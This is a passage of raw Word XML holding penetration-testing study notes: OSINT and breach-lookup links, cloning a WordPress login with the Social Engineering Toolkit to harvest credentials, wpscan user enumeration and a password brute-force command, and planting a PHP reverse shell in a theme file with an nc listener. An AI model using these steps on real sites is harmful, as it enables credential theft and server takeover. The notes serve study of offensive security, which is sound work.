    <w:p w14:paraId="03FFB7CC" w14:textId="6F85E727" w:rsidR="00353F2F" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>check for websites that share links such as hosting companies, amongst other information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F01A805" w14:textId="19A0BEFA" w:rsidR="00353F2F" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Determine or suggest intentions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CB36D1" w14:textId="6A1EA9E8" w:rsidR="00353F2F" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>private blog networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3569292F" w14:textId="03670412" w:rsidR="00353F2F" w:rsidRDefault="00353F2F" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213C616" w14:textId="18EDD20B" w:rsidR="00353F2F" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId207" w:history="1">
        <w:r w:rsidR="00353F2F" w:rsidRPr="00E72ED1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://nixintel.info/osint/website-osint-whats-the-link-between-antifa-com-and-russia/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="64949FA2" w14:textId="01B81078" w:rsidR="00353F2F" w:rsidRPr="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:color w:val="auto"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId208" w:history="1">
        <w:r w:rsidR="003F68C7" w:rsidRPr="00E72ED1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.theosintion.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0D5C8BBC" w14:textId="10CA6C80" w:rsidR="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId209" w:history="1">
        <w:r w:rsidR="00762B56" w:rsidRPr="00472D46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://yandex.com/images/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="00F40A9B" w14:textId="6922543B" w:rsidR="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId210" w:history="1">
        <w:r w:rsidR="00762B56" w:rsidRPr="00472D46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://tineye.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="543CE467" w14:textId="44AABF3B" w:rsidR="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId211" w:history="1">
        <w:r w:rsidR="00762B56" w:rsidRPr="00472D46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://haveibeenpwned.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="20925EE4" w14:textId="75F94F2C" w:rsidR="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId212" w:history="1">
        <w:r w:rsidR="00762B56" w:rsidRPr="00472D46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://scylla.sh/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B54FF3A" w14:textId="77F06E54" w:rsidR="00762B56" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId213" w:history="1">
        <w:r w:rsidR="00762B56" w:rsidRPr="00472D46">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://dehashed.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4172A67B" w14:textId="77777777" w:rsidR="00762B56" w:rsidRDefault="00762B56" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="35"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="285D1A90" w14:textId="3EB4DD49" w:rsidR="003F68C7" w:rsidRDefault="003F68C7" w:rsidP="003F68C7">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E16262D" w14:textId="5AB0FBC4" w:rsidR="003F68C7" w:rsidRDefault="00AE7FBA" w:rsidP="003F68C7">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Social Engineering Toolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B77BF9" w14:textId="68E910B4" w:rsidR="00AE7FBA" w:rsidRDefault="00AE7FBA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>setoolkit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5032A9BF" w14:textId="2406244D" w:rsidR="00AE7FBA" w:rsidRDefault="00AE7FBA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Clone a Website</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAB6947" w14:textId="2AFD103B" w:rsidR="00AE7FBA" w:rsidRDefault="00AE7FBA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Social-Engineering Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49646F70" w14:textId="19D2946E" w:rsidR="00AE7FBA" w:rsidRDefault="00AE7FBA" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Website Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94F589" w14:textId="22A8FB6E" w:rsidR="00AE7FBA" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Credential Harvester Attack Method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C271FE" w14:textId="6E6E2B27" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Site Cloner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137A7C18" w14:textId="64C042CE" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter IP of server hosting clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECFCE8C" w14:textId="4445092E" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enter URL to clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DF936" w14:textId="153508E3" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>like an admin login page from a wordpress site</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA2ACE8" w14:textId="17EA36FE" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm upload with navigation to IP and port in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4C59CF" w14:textId="67C91D8F" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>test by inputting garbage data and viewing terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297FE9AB" w14:textId="2B5F117F" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>failed attempt will forward to terminal and reload to actual site to avoid suspicion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792EF845" w14:textId="09FA600B" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wordpress Hacking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65434D40" w14:textId="3F309015" w:rsidR="00ED057B" w:rsidRDefault="00ED057B" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three Common </w:t>
      </w:r>
      <w:r w:rsidR="00F126C5">
        <w:t>Reasons for Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4514510B" w14:textId="5C299AED" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Human Error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329582E" w14:textId="156AF495" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerabilities in Wordpress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4335BF89" w14:textId="2582A19F" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Wordpress Plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7F10D4" w14:textId="715A5D7A" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Default configuration of Wordpress enables execution of arbitrary code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C0F4C0" w14:textId="366A5F8A" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Check Exploit-DB for plugins</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E00FB2" w14:textId="38C90A36" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Confirm website is using Wordpress either by “Powered by WordPress” or searching for common pages such as /wp-login.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13999542" w14:textId="21D6FA35" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can use wpscan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4988A3" w14:textId="778C0EB3" w:rsidR="008221B4" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId214" w:history="1">
        <w:r w:rsidR="008221B4" w:rsidRPr="005846DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://wpscan.com/wordpress-security-scanner</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="501D2C7A" w14:textId="77777777" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="757F934A" w14:textId="5337156C" w:rsidR="00F126C5" w:rsidRDefault="00F126C5" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">syntax. wpscan - -url </w:t>
      </w:r>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="005846DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://&lt;example.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>&gt; - -no</w:t>
      </w:r>
      <w:r w:rsidR="008221B4">
        <w:t>-update -e u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033DADC0" w14:textId="7F5ED802" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>enumeration of target and users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7491B065" w14:textId="7D22AAE9" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>scan site for possible passwords using cewl</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3603B52A" w14:textId="1D08565B" w:rsidR="008221B4" w:rsidRDefault="007A6E65" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId215" w:history="1">
        <w:r w:rsidR="008221B4" w:rsidRPr="005846DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://digi.ninja/projects/cewl.php</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="17CBE720" w14:textId="42EA4BCB" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">example – cewl </w:t>
      </w:r>
      <w:hyperlink r:id="rId216" w:history="1">
        <w:r w:rsidRPr="005846DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://repairshop.sbrc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> &gt; wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="316A820A" w14:textId="61FA66D8" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">example – wpscan - -url </w:t>
      </w:r>
      <w:hyperlink r:id="rId217" w:history="1">
        <w:r w:rsidRPr="005846DC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://repairshop.sbrc</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> -U theo -P wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4857FD" w14:textId="3436ABCD" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>having found username from prior wpscan search</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30699A16" w14:textId="6065E070" w:rsidR="008221B4" w:rsidRDefault="008221B4" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use login for admin pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6019AE" w14:textId="757A7B1D" w:rsidR="009E0AD9" w:rsidRDefault="009E0AD9" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>hack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D201F7" w14:textId="21D40A42" w:rsidR="00723F66" w:rsidRDefault="00723F66" w:rsidP="00723F66">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>users with Editor privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E9A4690" w14:textId="53D0F877" w:rsidR="00855F1D" w:rsidRDefault="00855F1D" w:rsidP="00855F1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows reverse shell with RCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D8CB0B" w14:textId="3D6BE938" w:rsidR="00855F1D" w:rsidRDefault="00855F1D" w:rsidP="00855F1D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>change pages in theme to send PHP shell to user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FDEEFEB" w14:textId="6CB5500D" w:rsidR="00FD3F36" w:rsidRDefault="00FD3F36" w:rsidP="00FD3F36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>input php shell into archive.php, separate but before the pre-existing code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CCF0A6" w14:textId="652F4D11" w:rsidR="00FD3F36" w:rsidRDefault="00FD3F36" w:rsidP="00FD3F36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>save and navigate in new tab to &lt;ip&gt;/wp-content/themes/&lt;theme name&gt;/archive.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AC7890" w14:textId="343B8F64" w:rsidR="00FD3F36" w:rsidRDefault="00FD3F36" w:rsidP="00FD3F36">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="36"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>confirm connection in nc listener on attacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="526FE728" w14:textId="06273BFA" w:rsidR="009E0AD9" w:rsidRDefault="009E0AD9" w:rsidP="009E0AD9">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C60B994" w14:textId="1324B101" w:rsidR="009E0AD9" w:rsidRDefault="00001CA3" w:rsidP="009E0AD9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>An attacker can use knowledgebases such as Rapid7, AttackerKB, MITRE, and Exploit-DB to look for vulnerabilities associated with versions of systems, applications, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A72FAF" w14:textId="4DBD31A1" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploiting Webservers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E25DA22" w14:textId="15D1E4B2" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Common Gateway Interface (CGI) allows for communication and processing of data between a client such as a web browser to a web server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F2B4D" w14:textId="177B1955" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>CGI is common in IoT, Routers, etc that cannot run complex frameworks such as PHP or Node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887A246" w14:textId="1707CFFB" w:rsidR="00001CA3" w:rsidRDefault="00001CA3" w:rsidP="007F0512">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="37"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>exploitable</w:t>
      </w:r>
    </w:p>
